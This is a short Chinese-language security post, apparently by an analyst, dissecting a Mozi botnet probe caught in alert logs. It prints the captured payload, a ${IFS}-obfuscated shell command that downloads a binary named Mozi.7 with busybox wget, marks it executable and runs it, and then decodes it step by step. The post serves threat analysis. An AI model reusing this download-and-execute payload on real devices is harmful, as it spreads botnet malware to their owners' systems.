2021年8月Mozi作者就已经被帽子叔叔抓捕归案了,同年Mozi僵尸网络基本就销声匿迹了,今天告警巡检又抓到一个Mozi僵尸网络,是一个扫描探测,没有攻击成功。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
简单分析如下,HTTP请求内容包含如下内容:
/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}Mozi.7;${IFS}busybox${IFS}wget${IFS}http://%s:%d/Mozi.7;${IFS}chmod${IFS}777${IFS}Mozi.7;${IFS}./Mozi.7'其中${IFS}是 shell 中的一个特殊变量,表示字段分隔符(Internal Field Separator)。在这段命令中,${IFS} 被用来表示空格符号。目的是为了确保在命令中的空格不被解释器当作参数的分隔符,而是作为参数的一部分。翻译翻译就是:
/bin/sh -c 'cd /tmp; rm -rf Mozi.7; busybox wget http://%s:%d/Mozi.7; chmod 777 Mozi.7; ./Mozi.7'再来逐段翻译翻译就是:
/bin/sh -c 启动一个 shell 。它将执行以下操作:cd /tmp: 切换到 /tmp 目录。rm -rf Mozi.7: 递归地删除名为 Mozi.7 的文件。busybox wget http://%s:%d/Mozi.7: 使用 busybox wget 命令下载一个文件chmod 777 Mozi.7: 给 Mozi.7 文件设置可执行权限。./Mozi.7: 执行 Mozi.7 文件。可惜了这里没有捕获到Mozi.7样本,继续蹲它~